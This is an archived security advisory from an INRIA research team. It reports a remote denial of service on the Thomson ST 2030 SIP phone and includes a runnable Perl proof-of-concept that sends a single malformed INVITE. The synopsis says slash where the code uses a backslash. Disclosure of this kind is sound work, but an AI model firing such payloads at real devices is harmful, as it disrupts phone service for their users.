thomsonsip-dos.txt

2007-08-24T00:00:00
ID PACKETSTORM:58801
Type packetstorm
Reporter Radu State
Modified 2007-08-24T00:00:00

Description

                                        
MADYNES Security Advisory : Remote DOS on Thomson SIP phone ST 2030  
  
  
  
Date of Discovery 15 February, 2007  
  
  
  
Vendor was notified on 1 March 2007  
  
  
  
ID: KIPH8  
  
  
  
Synopsis  
  
  
  
After receiving a message in which the space following the SIP version in the
Via header is replaced by a slash, the device looks functional but in fact no
longer responds to any event, resulting in a denial of service (DoS).

Background   
  
  
  
SIP is the IETF standardized protocol (RFCs 2543 and 3261) for VoIP
signalling. SIP is ASCII based; its INVITE message is used to initiate and
maintain a communication session.

Affected devices: Thomson SIP phone ST 2030  
  
  
  
Impact :  
  
A malicious user can remotely crash the device and cause a denial of service
by sending a single crafted SIP message.
  
  
  
Resolution  
  
Fixed software will be available from the vendor. Customers following
recommended best practices (i.e. segregating VoIP traffic from data traffic)
will be protected from such malicious traffic in most situations.
  
  
  
Credits  
  
  
  
Humberto J. Abdelnur (Ph.D Student)   
  
Radu State (Ph.D)   
  
Olivier Festor (Ph.D)   
  
  
  
This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer KIPH (for a description see
http://hal.inria.fr/inria-00166947/en).

Configuration of our device:

Software Version: v1.52.1
IP-Address obtained by DHCP as 192.168.1.106
User name : thomson

To run the exploit, launch the file thomson-2030-3.pl (assuming the
configuration above) as:

perl thomson-2030-3.pl 192.168.1.106 5060 thomson

POC Code :

#!/usr/bin/perl
# Vulnerability for Thomson 2030 firmware v1.52.1
# It provokes a DoS in the device.

use strict;
use warnings;
use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);

# UDP socket towards the phone's SIP port (5060 by default)
my $socket = IO::Socket::INET->new(PeerPort => $ARGV[1],
                                   Proto    => 'udp',
                                   PeerAddr => $ARGV[0])
    or die "Cannot create socket: $!";

# Crafted INVITE: the Via header carries a backslash instead of the
# mandatory space between "SIP/2.0/UDP" and the sent-by address.
my $msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\n"
        . "Via: SIP/2.0/UDP\\192.168.1.2;branch=00\r\n"
        . "From: Caripe <sip:caripe\@192.168.1.2>;tag=00\r\n"
        . "To: <sip:$ARGV[2]\@$ARGV[0]>;tag=00\r\n"
        . "Call-ID: caripe\@192.168.1.2\r\n"
        . "CSeq: 2 INVITE\r\n\r\n";

$socket->send($msg);